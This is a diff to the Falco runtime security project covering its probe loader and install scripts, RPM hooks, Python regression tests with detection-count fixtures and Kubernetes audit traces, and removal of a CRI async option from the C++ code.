+		make -C "/usr/src/${PACKAGE_NAME}-${FALCO_VERSION}/bpf" > /dev/null
+
+		mkdir -p ~/.falco
+		mv "/usr/src/${PACKAGE_NAME}-${FALCO_VERSION}/bpf/probe.o" "${HOME}/.falco/${BPF_PROBE_FILENAME}"
+
+		if [ -n "${BPF_KERNEL_SOURCES_URL}" ]; then
+			rm -r /tmp/kernel
+		fi
+	fi
+
+	if [ ! -f "${HOME}/.falco/${BPF_PROBE_FILENAME}" ]; then
+		local URL
+		URL=$(echo "${PROBE_URL}/${PACKAGES_REPOSITORY}/sysdig-probe-binaries/${BPF_PROBE_FILENAME}" | sed s/+/%2B/g)
+
+		echo "* Trying to download precompiled BPF probe from ${URL}"
+
+		curl --create-dirs "${FALCO_PROBE_CURL_OPTIONS}" -o "${HOME}/.falco/${BPF_PROBE_FILENAME}" "${URL}"
+	fi
+
+	if [ -f "${HOME}/.falco/${BPF_PROBE_FILENAME}" ]; then
+		if [ ! -f /proc/sys/net/core/bpf_jit_enable ]; then
+			echo "**********************************************************"
+			echo "** BPF doesn't have JIT enabled, performance might be   **"
+			echo "** degraded. Please ensure to run on a kernel with      **"
+			echo "** CONFIG_BPF_JIT enabled and/or use --net=host if      **"
+			echo "** running inside a container.                          **"
+			echo "**********************************************************"
+		fi
+
+		echo "* BPF probe located, it's now possible to start sysdig"
+
+		ln -sf "${HOME}/.falco/${BPF_PROBE_FILENAME}" "${HOME}/.falco/${BPF_PROBE_NAME}.o"
+		exit $?
+	else
+		echo "* Failure to find a BPF probe"
+		exit 1
+	fi
+}
+
+ARCH=$(uname -m)
+KERNEL_RELEASE=$(uname -r)
+SCRIPT_NAME=$(basename "${0}")
+PROBE_URL=${PROBE_URL:-https://s3.amazonaws.com/download.draios.com}
+if [ -n "$PROBE_INSECURE_DOWNLOAD" ]
+then
+	FALCO_PROBE_CURL_OPTIONS=-fsSk
+else
+	FALCO_PROBE_CURL_OPTIONS=-fsS
+fi
+
+MAX_RMMOD_WAIT=60
+if [[ $# -ge 1 ]]; then
+	MAX_RMMOD_WAIT=$1
+fi
+
+if [ -z "${PACKAGES_REPOSITORY}" ]; then
+	PACKAGES_REPOSITORY="stable"
+fi
+
+if [ "${SCRIPT_NAME}" = "falco-probe-loader" ]; then
+        if [ -z "$FALCO_VERSION" ]; then
+	    FALCO_VERSION=$(falco --version | cut -d' ' -f3)
+	fi
+	PROBE_NAME="falco-probe"
+	BPF_PROBE_NAME="falco-probe-bpf"
+	PACKAGE_NAME="falco"
+else
+	echo "This script must be called as falco-probe-loader"
+	exit 1
+fi
+
+if [ "$(id -u)" != 0 ]; then
+	echo "Installer must be run as root (or with sudo)."
+	exit 1
+fi
+
+if ! hash curl > /dev/null 2>&1; then
+	echo "This program requires curl"
+	exit 1
+fi
+
+if [ -v BPF_PROBE ] || [ "${1}" = "bpf" ]; then
+	load_bpf_probe
+else
+	load_kernel_probe
+fi

scripts/install-falco.sh

@@ -0,0 +1,200 @@
+#!/bin/bash
+#
+# Copyright (C) 2013-2018 Draios Inc dba Sysdig.
+#
+# This file is part of falco .
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#     http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+set -e
+
+function install_rpm {
+	if ! hash curl > /dev/null 2>&1; then
+		echo "* Installing curl"
+		yum -q -y install curl
+	fi
+
+	if ! yum -q list dkms > /dev/null 2>&1; then
+		echo "* Installing EPEL repository (for DKMS)"
+		if [ $VERSION -eq 8 ]; then
+			rpm --quiet -i https://dl.fedoraproject.org/pub/epel/epel-release-latest-8.noarch.rpm
+		elif [ $VERSION -eq 7 ]; then
+			rpm --quiet -i https://dl.fedoraproject.org/pub/epel/epel-release-latest-7.noarch.rpm
+		else
+			rpm --quiet -i https://mirrors.kernel.org/fedora-epel/6/i386/epel-release-6-8.noarch.rpm
+		fi
+	fi
+
+	echo "* Installing falco public key"
+	rpm --quiet --import https://s3.amazonaws.com/download.draios.com/DRAIOS-GPG-KEY.public
+	echo "* Installing falco repository"
+	curl -s -o /etc/yum.repos.d/draios.repo https://s3.amazonaws.com/download.draios.com/stable/rpm/draios.repo
+	echo "* Installing kernel headers"
+	KERNEL_VERSION=$(uname -r)
+	if [[ $KERNEL_VERSION == *PAE* ]]; then
+		yum -q -y install kernel-PAE-devel-${KERNEL_VERSION%.PAE} || kernel_warning
+	elif [[ $KERNEL_VERSION == *stab* ]]; then
+		# It's OpenVZ kernel and we should install another package
+		yum -q -y install vzkernel-devel-$KERNEL_VERSION || kernel_warning
+	elif [[ $KERNEL_VERSION == *uek* ]]; then
+		yum -q -y install kernel-uek-devel-$KERNEL_VERSION || kernel_warning
+	else
+		yum -q -y install kernel-devel-$KERNEL_VERSION || kernel_warning
+	fi
+	echo "* Installing falco"
+	yum -q -y install falco
+}
+
+function install_deb {
+	export DEBIAN_FRONTEND=noninteractive
+
+	if ! hash curl > /dev/null 2>&1; then
+		echo "* Installing curl"
+		apt-get -qq -y install curl < /dev/null
+	fi
+
+	echo "* Installing Sysdig public key"
+	curl -s https://s3.amazonaws.com/download.draios.com/DRAIOS-GPG-KEY.public | apt-key add -
+	echo "* Installing falco repository"
+	curl -s -o /etc/apt/sources.list.d/draios.list https://s3.amazonaws.com/download.draios.com/stable/deb/draios.list
+	apt-get -qq update < /dev/null
+	echo "* Installing kernel headers"
+	apt-get -qq -y install linux-headers-$(uname -r) < /dev/null || kernel_warning
+	echo "* Installing falco"
+	apt-get -qq -y install falco < /dev/null
+}
+
+function unsupported {
+	echo 'Unsupported operating system. Please consider writing to the mailing list at'
+	echo 'https://groups.google.com/forum/#!forum/sysdig or trying the manual'
+	echo 'installation.'
+	exit 1
+}
+
+function kernel_warning {
+	echo "Unable to find kernel development files for the current kernel version" $(uname -r)
+	echo "This usually means that your system is not up-to-date or you installed a custom kernel version."
+	echo "The installation will continue but you'll need to install these yourself in order to use falco."
+	echo 'Please write to the mailing list at https://groups.google.com/forum/#!forum/sysdig'
+	echo "if you need further assistance."
+}
+
+if [ $(id -u) != 0 ]; then
+	echo "Installer must be run as root (or with sudo)."
+	exit 1
+fi
+
+echo "* Detecting operating system"
+
+ARCH=$(uname -m)
+if [[ ! $ARCH = *86 ]] && [ ! $ARCH = "x86_64" ] && [ ! $ARCH = "s390x" ]; then
+	unsupported
+fi
+
+if [ $ARCH = "s390x" ]; then
+	echo "------------"
+	echo "WARNING: A Docker container is the only officially supported platform on s390x"
+	echo "------------"
+fi
+
+if [ -f /etc/debian_version ]; then
+	if [ -f /etc/lsb-release ]; then
+		. /etc/lsb-release
+		DISTRO=$DISTRIB_ID
+		VERSION=${DISTRIB_RELEASE%%.*}
+	else
+		DISTRO="Debian"
+		VERSION=$(cat /etc/debian_version | cut -d'.' -f1)
+	fi
+
+	case "$DISTRO" in
+
+		"Ubuntu")
+			if [ $VERSION -ge 10 ]; then
+				install_deb
+			else
+				unsupported
+			fi
+			;;
+
+		"LinuxMint")
+			if [ $VERSION -ge 9 ]; then
+				install_deb
+			else
+				unsupported
+			fi
+			;;
+
+		"Debian")
+			if [ $VERSION -ge 6 ]; then
+				install_deb
+			elif [[ $VERSION == *sid* ]]; then
+				install_deb
+			else
+				unsupported
+			fi
+			;;
+
+		*)
+			unsupported
+			;;
+
+	esac
+
+elif [ -f /etc/system-release-cpe ]; then
+	DISTRO=$(cat /etc/system-release-cpe | cut -d':' -f3)
+
+	# New Amazon Linux 2 distro
+	if [[ -f /etc/image-id ]]; then
+		AMZ_AMI_VERSION=$(cat /etc/image-id | grep 'image_name' | cut -d"=" -f2 | tr -d "\"")
+	fi
+
+	if [[ "${DISTRO}" == "o" ]] && [[ ${AMZ_AMI_VERSION} = *"amzn2"* ]]; then
+		DISTRO=$(cat /etc/system-release-cpe | cut -d':' -f4)
+	fi
+
+	VERSION=$(cat /etc/system-release-cpe | cut -d':' -f5 | cut -d'.' -f1 | sed 's/[^0-9]*//g')
+
+	case "$DISTRO" in
+
+		"oracle" | "centos" | "redhat")
+			if [ $VERSION -ge 6 ]; then
+				install_rpm
+			else
+				unsupported
+			fi
+			;;
+
+		"amazon")
+			install_rpm
+			;;
+
+		"fedoraproject")
+			if [ $VERSION -ge 13 ]; then
+				install_rpm
+			else
+				unsupported
+			fi
+			;;
+
+		*)
+			unsupported
+			;;
+
+	esac
+
+else
+	unsupported
+fi
+
+modprobe -r falco_probe

scripts/rpm/postinstall

@@ -1,5 +1,5 @@
 #
-# Copyright (C) 2020 The Falco Authors.
+# Copyright (C) 2019 The Falco Authors.
 #
 #
 # Licensed under the Apache License, Version 2.0 (the "License");
@@ -14,8 +14,8 @@
 # See the License for the specific language governing permissions and
 # limitations under the License.
 #
-
-mod_version="@PROBE_VERSION@"
+rpm_v=%{version}
+mod_version=${rpm_v//_/-}
 dkms add -m falco -v $mod_version --rpm_safe_upgrade
 if [ `uname -r | grep -c "BOOT"` -eq 0 ] && [ -e /lib/modules/`uname -r`/build/include ]; then
 	dkms build -m falco -v $mod_version

scripts/rpm/preuninstall

@@ -19,6 +19,6 @@ if [ $1 = 0 ]; then
 	/sbin/service falco stop > /dev/null 2>&1
 	/sbin/chkconfig --del falco
 fi
-
-mod_version="@PROBE_VERSION@"
+rpm_v=%{version}
+mod_version=${rpm_v//_/-}
 dkms remove -m falco -v $mod_version --all --rpm_safe_upgrade

test/README.md

@@ -1,6 +0,0 @@
-# Falco Regression tests
-
-This folder contains the Regression tests suite for Falco.
-
-You can find instructions on how to run this test suite on the Falco website [here](https://falco.org/docs/source/#run-regression-tests).
-

test/falco_k8s_audit_tests.yaml

@@ -576,40 +576,3 @@ trace_files: !mux
     detect_counts:
       - K8s Role/Clusterrolebinding Deleted: 1
     trace_file: trace_files/k8s_audit/delete_clusterrolebinding.json
-
-  create_secret:
-    detect: True
-    detect_level: INFO
-    rules_file:
-      - ../rules/falco_rules.yaml
-      - ../rules/k8s_audit_rules.yaml
-    detect_counts:
-      - K8s Secret Created: 1
-    trace_file: trace_files/k8s_audit/create_secret.json
-
-  # Should *not* result in any event as the secret rules skip service account token secrets
-  create_service_account_token_secret:
-    detect: False
-    detect_level: INFO
-    rules_file:
-      - ../rules/falco_rules.yaml
-      - ../rules/k8s_audit_rules.yaml
-    trace_file: trace_files/k8s_audit/create_service_account_token_secret.json
-
-  create_kube_system_secret:
-    detect: False
-    detect_level: INFO
-    rules_file:
-      - ../rules/falco_rules.yaml
-      - ../rules/k8s_audit_rules.yaml
-    trace_file: trace_files/k8s_audit/create_kube_system_secret.json
-
-  delete_secret:
-    detect: True
-    detect_level: INFO
-    rules_file:
-      - ../rules/falco_rules.yaml
-      - ../rules/k8s_audit_rules.yaml
-    detect_counts:
-      - K8s Secret Deleted: 1
-    trace_file: trace_files/k8s_audit/delete_secret.json

test/falco_test.py

@@ -18,16 +18,17 @@
 import os
 import re
 import json
+import sets
 import glob
 import shutil
 import stat
 import subprocess
 import sys
-import urllib.request
+import urllib
 
 from avocado import Test
-from avocado import main
 from avocado.utils import process
+from avocado.utils import linux_modules
 
 class FalcoTest(Test):
 
@@ -141,15 +142,15 @@ class FalcoTest(Test):
         else:
             detect_counts = {}
             for item in self.detect_counts:
-                for key, value in list(item.items()):
+                for key, value in item.items():
                     detect_counts[key] = value
             self.detect_counts = detect_counts
 
         self.rules_warning = self.params.get('rules_warning', '*', default=False)
         if self.rules_warning == False:
-            self.rules_warning = set()
+            self.rules_warning = sets.Set()
         else:
-            self.rules_warning = set(self.rules_warning)
+            self.rules_warning = sets.Set(self.rules_warning)
 
         # Maps from rule name to set of evttypes
         self.rules_events = self.params.get('rules_events', '*', default=False)
@@ -159,7 +160,7 @@ class FalcoTest(Test):
             events = {}
             for item in self.rules_events:
                 for item2 in item:
-                    events[item2[0]] = set(item2[1])
+                    events[item2[0]] = sets.Set(item2[1])
             self.rules_events = events
 
         if self.should_detect:
@@ -175,7 +176,7 @@ class FalcoTest(Test):
         self.copy_local_driver = self.params.get('copy_local_driver', '*', default=False)
 
         # Used by possibly_copy_local_driver as well as docker run
-        self.module_dir = os.path.expanduser("~/.falco")
+        self.module_dir = os.path.expanduser("~/.sysdig")
 
         self.outputs = self.params.get('outputs', '*', default='')
 
@@ -184,7 +185,7 @@ class FalcoTest(Test):
         else:
             outputs = []
             for item in self.outputs:
-                for key, value in list(item.items()):
+                for key, value in item.items():
                     output = {}
                     output['file'] = key
                     output['line'] = value
@@ -213,9 +214,9 @@ class FalcoTest(Test):
 
     def check_rules_warnings(self, res):
 
-        found_warning = set()
+        found_warning = sets.Set()
 
-        for match in re.finditer('Rule ([^:]+): warning \(([^)]+)\):', res.stderr.decode("utf-8")):
+        for match in re.finditer('Rule ([^:]+): warning \(([^)]+)\):', res.stderr):
             rule = match.group(1)
             warning = match.group(2)
             found_warning.add(rule)
@@ -230,21 +231,21 @@ class FalcoTest(Test):
 
         found_events = {}
 
-        for match in re.finditer('Event types for rule ([^:]+): (\S+)', res.stderr.decode("utf-8")):
+        for match in re.finditer('Event types for rule ([^:]+): (\S+)', res.stderr):
             rule = match.group(1)
-            events = set(match.group(2).split(","))
+            events = sets.Set(match.group(2).split(","))
             found_events[rule] = events
 
         self.log.debug("Expected events for rules: {}".format(self.rules_events))
         self.log.debug("Actual events for rules: {}".format(found_events))
 
-        for rule in list(found_events.keys()):
+        for rule in found_events.keys():
             if found_events.get(rule) != self.rules_events.get(rule):
                 self.fail("rule {}: expected events {} differs from actual events {}".format(rule, self.rules_events.get(rule), found_events.get(rule)))
 
     def check_detections(self, res):
         # Get the number of events detected.
-        match = re.search('Events detected: (\d+)', res.stdout.decode("utf-8"))
+        match = re.search('Events detected: (\d+)', res.stdout)
         if match is None:
             self.fail("Could not find a line 'Events detected: <count>' in falco output")
 
@@ -259,7 +260,7 @@ class FalcoTest(Test):
 
             for level in self.detect_level:
                 level_line = '(?i){}: (\d+)'.format(level)
-                match = re.search(level_line, res.stdout.decode("utf-8"))
+                match = re.search(level_line, res.stdout)
 
                 if match is None:
                     self.fail("Could not find a line '{}: <count>' in falco output".format(level))
@@ -271,13 +272,13 @@ class FalcoTest(Test):
 
     def check_detections_by_rule(self, res):
         # Get the number of events detected for each rule. Must match the expected counts.
-        match = re.search('Triggered rules by rule name:(.*)', res.stdout.decode("utf-8"), re.DOTALL)
+        match = re.search('Triggered rules by rule name:(.*)', res.stdout, re.DOTALL)
         if match is None:
             self.fail("Could not find a block 'Triggered rules by rule name: ...' in falco output")
 
         triggered_rules = match.group(1)
 
-        for rule, count in list(self.detect_counts.items()):
+        for rule, count in self.detect_counts.iteritems():
             expected = '\s{}: (\d+)'.format(re.sub(r'([$\.*+?()[\]{}|^])', r'\\\1', rule))
             match = re.search(expected, triggered_rules)
 
@@ -312,7 +313,7 @@ class FalcoTest(Test):
         if self.json_output:
             # Just verify that any lines starting with '{' are valid json objects.
             # Doesn't do any deep inspection of the contents.
-            for line in res.stdout.decode("utf-8").splitlines():
+            for line in res.stdout.splitlines():
                 if line.startswith('{'):
                     obj = json.loads(line)
                     if self.json_include_output_property:
@@ -335,7 +336,7 @@ class FalcoTest(Test):
             self.falco_binary_path = "docker run --rm --name falco-test --privileged " \
                                      "-v /var/run/docker.sock:/host/var/run/docker.sock " \
                                      "-v /dev:/host/dev -v /proc:/host/proc:ro -v /boot:/host/boot:ro " \
-                                     "-v /lib/modules:/host/lib/modules:ro -v {}:/root/.falco:ro " \
+                                     "-v /lib/modules:/host/lib/modules:ro -v {}:/root/.sysdig:ro " \
                                      "-v /usr:/host/usr:ro {} {} falco".format(
                                          self.module_dir, self.addl_docker_run_args, image)
 
@@ -387,7 +388,8 @@ class FalcoTest(Test):
             res = process.run(cmdline, timeout=120, sudo=True)
 
     def possibly_copy_driver(self):
-        # Remove the contents of ~/.falco regardless of copy_local_driver.
+        # Remove the contents of ~/.sysdig regardless of
+        # copy_local_driver.
         self.log.debug("Checking for module dir {}".format(self.module_dir))
         if os.path.isdir(self.module_dir):
             self.log.info("Removing files below directory {}".format(self.module_dir))
@@ -396,8 +398,7 @@ class FalcoTest(Test):
                 os.remove(rmfile)
 
         if self.copy_local_driver:
-            verlines = [str.strip() for str in subprocess.check_output([self.falco_binary_path, "--version"]).splitlines()]
-            verstr = verlines[0].decode("utf-8")
+            verstr = subprocess.check_output([self.falco_binary_path, "--version"]).rstrip()
             self.log.info("verstr {}".format(verstr))
             falco_version = verstr.split(" ")[2]
             self.log.info("falco_version {}".format(falco_version))
@@ -406,7 +407,7 @@ class FalcoTest(Test):
             kernel_release = subprocess.check_output(["uname", "-r"]).rstrip()
             self.log.info("kernel release {}".format(kernel_release))
 
-            # falco-driver-loader has a more comprehensive set of ways to
+            # falco-probe-loader has a more comprehensive set of ways to
             # find the config hash. We only look at /boot/config-<kernel release>
             md5_output = subprocess.check_output(["md5sum", "/boot/config-{}".format(kernel_release)]).rstrip()
             config_hash = md5_output.split(" ")[0]
@@ -439,7 +440,7 @@ class FalcoTest(Test):
             if not os.path.isfile(self.psp_conv_path):
                 self.log.info("Downloading {} to {}".format(self.psp_conv_url, self.psp_conv_path))
 
-                urllib.request.urlretrieve(self.psp_conv_url, self.psp_conv_path)
+                urllib.urlretrieve(self.psp_conv_url, self.psp_conv_path)
                 os.chmod(self.psp_conv_path, stat.S_IEXEC)
 
             conv_cmd = '{} convert psp --psp-path {} --rules-path {}'.format(
@@ -483,32 +484,32 @@ class FalcoTest(Test):
 
         if self.stdout_is != '':
             print(self.stdout_is)
-            if self.stdout_is != res.stdout.decode("utf-8"):
+            if self.stdout_is != res.stdout:
                 self.fail("Stdout was not exactly {}".format(self.stdout_is))
 
         if self.stderr_is != '':
-            if self.stderr_is != res.stdout.decode("utf-8"):
+            if self.stderr_is != res.stdout:
                 self.fail("Stdout was not exactly {}".format(self.stderr_is))
 
         for pattern in self.stderr_contains:
-            match = re.search(pattern, res.stderr.decode("utf-8"))
+            match = re.search(pattern, res.stderr)
             if match is None:
                 self.fail("Stderr of falco process did not contain content matching {}".format(pattern))
 
         for pattern in self.stdout_contains:
-            match = re.search(pattern, res.stdout.decode("utf-8"))
+            match = re.search(pattern, res.stdout)
             if match is None:
-                self.fail("Stdout of falco process '{}' did not contain content matching {}".format(res.stdout.decode("utf-8"), pattern))
+                self.fail("Stdout of falco process '{}' did not contain content matching {}".format(res.stdout, pattern))
 
         for pattern in self.stderr_not_contains:
-            match = re.search(pattern, res.stderr.decode("utf-8"))
+            match = re.search(pattern, res.stderr)
             if match is not None:
                 self.fail("Stderr of falco process contained content matching {} when it should have not".format(pattern))
 
         for pattern in self.stdout_not_contains:
-            match = re.search(pattern, res.stdout.decode("utf-8"))
+            match = re.search(pattern, res.stdout)
             if match is not None:
-                self.fail("Stdout of falco process '{}' did contain content matching {} when it should have not".format(res.stdout.decode("utf-8"), pattern))
+                self.fail("Stdout of falco process '{}' did contain content matching {} when it should have not".format(res.stdout, pattern))
 
         if res.exit_status != self.exit_status:
             self.error("Falco command \"{}\" exited with unexpected return value {} (!= {})".format(

test/falco_tests.yaml

@@ -689,7 +689,7 @@ trace_files: !mux
       - "Non sudo setuid": 1
       - "Create files below dev": 1
       - "Modify binary dirs": 2
-      - "Change thread namespace": 1
+      - "Change thread namespace": 2
 
   disabled_tags_a:
     detect: True

test/falco_traces.yaml.in

@@ -26,7 +26,7 @@ traces: !mux
     detect: True
     detect_level: NOTICE
     detect_counts:
-      - "Change thread namespace": 1
+      - "Change thread namespace": 2
 
   container-privileged:
     trace_file: traces-positive/container-privileged.scap
@@ -73,7 +73,7 @@ traces: !mux
       - "Non sudo setuid": 1
       - "Create files below dev": 1
       - "Modify binary dirs": 2
-      - "Change thread namespace": 1
+      - "Change thread namespace": 2
 
   mkdir-binary-dirs:
     trace_file: traces-positive/mkdir-binary-dirs.scap

test/trace_files/k8s_audit/create_kube_system_secret.json

@@ -1 +0,0 @@
-{"kind":"Event","apiVersion":"audit.k8s.io/v1","level":"Metadata","auditID":"263db4e4-f0bb-41b4-913d-c03815f49be5","stage":"ResponseComplete","requestURI":"/api/v1/namespaces/kube-system/secrets","verb":"create","user":{"username":"admin","groups":["system:masters","system:authenticated"]},"sourceIPs":["127.0.0.1"],"userAgent":"kubeadm/v1.16.2 (linux/amd64) kubernetes/c97fe50","objectRef":{"resource":"secrets","namespace":"kube-system","name":"bootstrap-token-ne7bxu","apiVersion":"v1"},"responseStatus":{"metadata":{},"code":201},"requestReceivedTimestamp":"2020-03-24T18:53:49.023018Z","stageTimestamp":"2020-03-24T18:53:49.025530Z","annotations":{"authorization.k8s.io/decision":"allow","authorization.k8s.io/reason":""}}

test/trace_files/k8s_audit/create_secret.json

@@ -1,2 +0,0 @@
-{"kind":"Event","apiVersion":"audit.k8s.io/v1","level":"Metadata","auditID":"55a81824-ab56-46c5-8b02-96336f5e78d7","stage":"ResponseComplete","requestURI":"/api/v1/namespaces/default/secrets","verb":"create","user":{"username":"minikube-user","groups":["system:masters","system:authenticated"]},"sourceIPs":["192.168.64.1"],"userAgent":"kubectl/v1.17.3 (darwin/amd64) kubernetes/06ad960","objectRef":{"resource":"secrets","namespace":"default","name":"example-secret","apiVersion":"v1"},"responseStatus":{"metadata":{},"code":201},"requestReceivedTimestamp":"2020-04-21T17:57:05.541358Z","stageTimestamp":"2020-04-21T17:57:05.548299Z","annotations":{"authorization.k8s.io/decision":"allow","authorization.k8s.io/reason":""}}
-

test/trace_files/k8s_audit/create_service_account_token_secret.json

@@ -1 +0,0 @@
-{"kind":"Event","apiVersion":"audit.k8s.io/v1","level":"Metadata","auditID":"40ed7b5a-e92f-49ec-a359-86d36077d9c8","stage":"ResponseComplete","requestURI":"/api/v1/namespaces/test2/secrets","verb":"create","user":{"username":"system:kube-controller-manager","groups":["system:authenticated"]},"sourceIPs":["127.0.0.1"],"userAgent":"kube-controller-manager/v1.17.3 (linux/amd64) kubernetes/06ad960/tokens-controller","objectRef":{"resource":"secrets","namespace":"test2","name":"default-token-7v4pb","apiVersion":"v1"},"responseStatus":{"metadata":{},"code":201},"requestReceivedTimestamp":"2020-04-21T17:32:29.939199Z","stageTimestamp":"2020-04-21T17:32:29.942468Z","annotations":{"authorization.k8s.io/decision":"allow","authorization.k8s.io/reason":"RBAC: allowed by ClusterRoleBinding \"system:kube-controller-manager\" of ClusterRole \"system:kube-controller-manager\" to User \"system:kube-controller-manager\""}}

test/trace_files/k8s_audit/delete_secret.json

@@ -1 +0,0 @@
-{"kind":"Event","apiVersion":"audit.k8s.io/v1","level":"Metadata","auditID":"d1df3fa9-497f-49cf-bd48-60a651df8075","stage":"ResponseComplete","requestURI":"/api/v1/namespaces/default/secrets/example-secret","verb":"delete","user":{"username":"minikube-user","groups":["system:masters","system:authenticated"]},"sourceIPs":["192.168.64.1"],"userAgent":"kubectl/v1.17.3 (darwin/amd64) kubernetes/06ad960","objectRef":{"resource":"secrets","namespace":"default","name":"example-secret","apiVersion":"v1"},"responseStatus":{"metadata":{},"status":"Success","code":200},"requestReceivedTimestamp":"2020-04-21T17:58:49.691845Z","stageTimestamp":"2020-04-21T17:58:49.696309Z","annotations":{"authorization.k8s.io/decision":"allow","authorization.k8s.io/reason":""}}

userspace/falco/CMakeLists.txt

@@ -75,7 +75,6 @@ target_include_directories(
     "${YAMLCPP_INCLUDE_DIR}"
     "${CIVETWEB_INCLUDE_DIR}"
     "${GRPC_INCLUDE}"
-    "${GRPCPP_INCLUDE}"
     "${PROTOBUF_INCLUDE}"
     "${CMAKE_CURRENT_BINARY_DIR}"
     "${DRAIOS_DEPENDENCIES_DIR}/yaml-${DRAIOS_YAML_VERSION}/target/include")
@@ -84,9 +83,8 @@ target_link_libraries(
   falco
   falco_engine
   sinsp
-  "${GPR_LIB}"
-  "${GRPC_LIB}"
   "${GRPCPP_LIB}"
+  "${GRPC_LIB}"
   "${PROTOBUF_LIB}"
   "${LIBYAML_LIB}"
   "${YAMLCPP_LIB}"

userspace/falco/config_falco.h.in

@@ -31,5 +31,4 @@ limitations under the License.
 #define FALCO_INSTALL_CONF_FILE "/etc/falco/falco.yaml"
 #define FALCO_SOURCE_LUA_DIR "${PROJECT_SOURCE_DIR}/userspace/falco/lua/"
 
-#define PROBE_NAME "@PROBE_NAME@"
-#define DRIVER_VERSION "@PROBE_VERSION@"
+#define PROBE_NAME "${PROBE_NAME}"

userspace/falco/falco.cpp

@@ -89,12 +89,6 @@ static void usage()
 	   " --cri <path>                  Path to CRI socket for container metadata.\n"
 	   "                               Use the specified socket to fetch data from a CRI-compatible runtime.\n"
 	   " -d, --daemon                  Run as a daemon.\n"
-	   " --disable-cri-async           Disable asynchronous CRI metadata fetching.\n"
-	   "                               This is useful to let the input event wait for the container metadata fetch\n"
-	   "                               to finish before moving forward. Async fetching, in some environments leads\n"
-	   "                               to empty fields for container metadata when the fetch is not fast enough to be\n"
-	   "                               completed asynchronously. This can have a performance penalty on your environment\n"
-	   "                               depending on the number of containers and the frequency at which they are created/started/stopped\n"
 	   " --disable-source <event_source>\n"
 	   "                               Disable a specific event source.\n"
 	   "                               Available event sources are: syscall, k8s_audit.\n"
@@ -439,7 +433,6 @@ int falco_init(int argc, char **argv)
 	string list_flds_source = "";
 	bool print_support = false;
 	string cri_socket_path;
-	bool cri_async = true;
 	set<string> disable_sources;
 	bool disable_syscall = false;
 	bool disable_k8s_audit = false;
@@ -466,7 +459,6 @@ int falco_init(int argc, char **argv)
 	{
 		{"cri", required_argument, 0},
         {"daemon", no_argument, 0, 'd'},
-        {"disable-cri-async", no_argument, 0, 0},
         {"disable-source", required_argument, 0},
         {"help", no_argument, 0, 'h'},
         {"ignored-events", no_argument, 0, 'i'},
@@ -624,7 +616,6 @@ int falco_init(int argc, char **argv)
 				if(string(long_options[long_index].name) == "version")
 				{
 					printf("Falco version: %s\n", FALCO_VERSION);
-					printf("Driver version: %s\n", DRIVER_VERSION);
 					return EXIT_SUCCESS;
 				}
 				else if (string(long_options[long_index].name) == "cri")
@@ -634,10 +625,6 @@ int falco_init(int argc, char **argv)
 						cri_socket_path = optarg;
 					}
 				}
-				else if (string(long_options[long_index].name) == "disable-cri-async")
-				{
-				  cri_async = false;
-				}
 				else if (string(long_options[long_index].name) == "list")
 				{
 					list_flds = true;
@@ -678,9 +665,6 @@ int falco_init(int argc, char **argv)
 			inspector->set_cri_socket_path(cri_socket_path);
 		}
 
-		// Decide wether to do sync or async for CRI metadata fetch
-		inspector->set_cri_async(cri_async);
-
 		//
 		// If required, set the snaplen
 		//